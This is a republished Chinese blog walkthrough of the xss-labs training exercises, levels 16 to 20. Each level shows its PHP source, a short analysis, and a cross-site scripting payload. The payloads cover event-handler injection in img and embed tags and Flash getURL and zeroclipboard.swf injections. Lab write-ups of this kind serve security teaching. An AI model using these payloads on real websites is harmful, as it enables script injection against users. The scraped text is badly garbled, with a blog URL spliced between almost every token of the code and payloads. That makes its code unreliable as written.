payload为:keywordimg%https://blog.csdn.net/m0_52051132/article/details/0https://blog.csdn.net/m0_52051132/article/details/Asrc=https://blog.csdn.net/m0_52051132/article/details/xss%https://blog.csdn.net/m0_52051132/article/details/0https://blog.csdn.net/m0_52051132/article/details/Donmouseover=https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/'xss'https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

在这里插入图片描述

level 17

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "embedsrc=https://blog.csdn.net/m0_52051132/article/details/xsf01.https://blog.csdn.net/m0_52051132/article/details/swf?https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg01"])."https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg width=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/ heigth=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/";https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:出的值都被做了实体化转义,无法闭合标签,但是问题在于本身embed标签可以加 入事件,可以在arg01,或者arg中加入事件去触发即可

payload:arg01=https://blog.csdn.net/m0_52051132/article/details/123https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/20https://blog.csdn.net/m0_52051132/article/details/onmouseover=https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/'xss'https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/&https://blog.csdn.net/m0_52051132/article/details/arg02=https://blog.csdn.net/m0_52051132/article/details/b

在这里插入图片描述

level 18

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "embedsrc=https://blog.csdn.net/m0_52051132/article/details/xsf02.https://blog.csdn.net/m0_52051132/article/details/swf?https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg01"])."https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg width=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/ heigth=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/";https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:用上一关的方法:

payload:arg01=https://blog.csdn.net/m0_52051132/article/details/123https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/20https://blog.csdn.net/m0_52051132/article/details/onmouseover=https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/'xss'https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/&https://blog.csdn.net/m0_52051132/article/details/arg02=https://blog.csdn.net/m0_52051132/article/details/b

在这里插入图片描述

level 19

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo 'embedsrc=https://blog.csdn.net/m0_52051132/article/details/"xsf03.swf?'.htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg01"])."https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/ar width=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/ heigth=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:这一关开始是flash xss了,首先下载页面中的flash,对源码进行分析,我用的是 JPEXS这款工具,首先定位getURL函数

sIFR.https://blog.csdn.net/m0_52051132/article/details/menuItems.https://blog.csdn.net/m0_52051132/article/details/pushhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/new ContextMenuItemhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"Followlink"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/functionhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/getURLhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/sIFR.https://blog.csdn.net/m0_52051132/article/details/instance.https://blog.csdn.net/m0_52051132/article/details/primaryLink,https://blog.csdn.net/m0_52051132/article/details/sIFR.https://blog.csdn.net/m0_52051132/article/details/instance.https://blog.csdn.net/m0_52051132/article/details/primaryLinkTarget)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/ }https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/new ContextMenuItemhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"Open link in new window"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/functionhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/getURLhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/sIFR.https://blog.csdn.net/m0_52051132/article/details/instance.https://blog.csdn.net/m0_52051132/article/details/primaryLink,https://blog.csdn.net/m0_52051132/article/details/"_blank"https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/再追踪到sIFR的内容,https://blog.csdn.net/m0_52051132/article/details/省略了一些代码,关键代码如下:ifhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/_loc5_ &&https://blog.csdn.net/m0_52051132/article/details/ _root.https://blog.csdn.net/m0_52051132/article/details/version !=https://blog.csdn.net/m0_52051132/article/details/ sIFR.https://blog.csdn.net/m0_52051132/article/details/VERSION)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/_loc4_ =https://blog.csdn.net/m0_52051132/article/details/ sIFR.https://blog.csdn.net/m0_52051132/article/details/VERSION_WARNING.https://blog.csdn.net/m0_52051132/article/details/splithttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"%s"https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/joinhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/_root.https://blog.csdn.net/m0_52051132/article/details/version)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/得知version参数可以传入loc4变量中,即sIFR的内容中,但是getURL 只在内容为link 时,打开,故定位以下函数:function contentIsLinkhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/returnhttps://blog.csdn.net/m0_52051132/article/details/ this.https://blog.csdn.net/m0_52051132/article/details/content.https://blog.csdn.net/m0_52051132/article/details/indexOfhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/")https://blog.csdn.net/m0_52051132/article/details/ ==https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/ &&https://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/this.https://blog.csdn.net/m0_52051132/article/details/content.https://blog.csdn.net/m0_52051132/article/details/indexOfhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/")https://blog.csdn.net/m0_52051132/article/details/ ==https://blog.csdn.net/m0_52051132/article/details/this.https://blog.csdn.net/m0_52051132/article/details/content.https://blog.csdn.net/m0_52051132/article/details/lastIndexOfhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/")https://blog.csdn.net/m0_52051132/article/details/ &&https://blog.csdn.net/m0_52051132/article/details/this.https://blog.csdn.net/m0_52051132/article/details/content.https://blog.csdn.net/m0_52051132/article/details/indexOfhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/ ==https://blog.csdn.net/m0_52051132/article/details/   this.https://blog.csdn.net/m0_52051132/article/details/content.https://blog.csdn.net/m0_52051132/article/details/length -https://blog.csdn.net/m0_52051132/article/details/ 4https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/  //大体意思是要geturl得用a标签。https://blog.csdn.net/m0_52051132/article/details/
payload为:arg01=https://blog.csdn.net/m0_52051132/article/details/version&https://blog.csdn.net/m0_52051132/article/details/arg02=https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/3https://blog.csdn.net/m0_52051132/article/details/Ca%https://blog.csdn.net/m0_52051132/article/details/20https://blog.csdn.net/m0_52051132/article/details/href=https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/22https://blog.csdn.net/m0_52051132/article/details/javascript:https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/27https://blog.csdn.net/m0_52051132/article/details/xss%https://blog.csdn.net/m0_52051132/article/details/27https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/22https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/3E111https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/3https://blog.csdn.net/m0_52051132/article/details/C/https://blog.csdn.net/m0_52051132/article/details/a%https://blog.csdn.net/m0_52051132/article/details/3https://blog.csdn.net/m0_52051132/article/details/E //点击传入进去的’111‘就可以触发XSS。https://blog.csdn.net/m0_52051132/article/details/

在这里插入图片描述

level 20

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo 'embedsrc=https://blog.csdn.net/m0_52051132/article/details/"xsf04.swf?'.htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/arg01"])."https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/".htmlspecialchars($_GET["https://blog.csdn.net/m0_52051132/article/details/ar width=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/ heigth=https://blog.csdn.net/m0_52051132/article/details/100https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:可以看到此处依然是将我们提交的两个参数值插入到了标签的src属性值 中,并且这里还是引用了一个swf文件,但是唯一不同的是这里的swf文件在页面上并没有 显示出来。还是用JPEXS对xsf04.swf文件进行反编译
在这里插入图片描述

发现这是一个国内比较普遍的一个flash插件zeroclipboard.swf
可以参考freebuf文章http://www.freebuf.com/sectool/108568.html

payload为:arg01=https://blog.csdn.net/m0_52051132/article/details/id&https://blog.csdn.net/m0_52051132/article/details/arg02=https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/22https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/catchhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/e)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/alert)https://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/XSS/https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/source)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details///%26width=500%26height=500https://blog.csdn.net/m0_52051132/article/details/

在这里插入图片描述

以上为xss-labs全通关学习!!!

来源地址:https://blog.csdn.net/m0_52051132/article/details/127334975

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯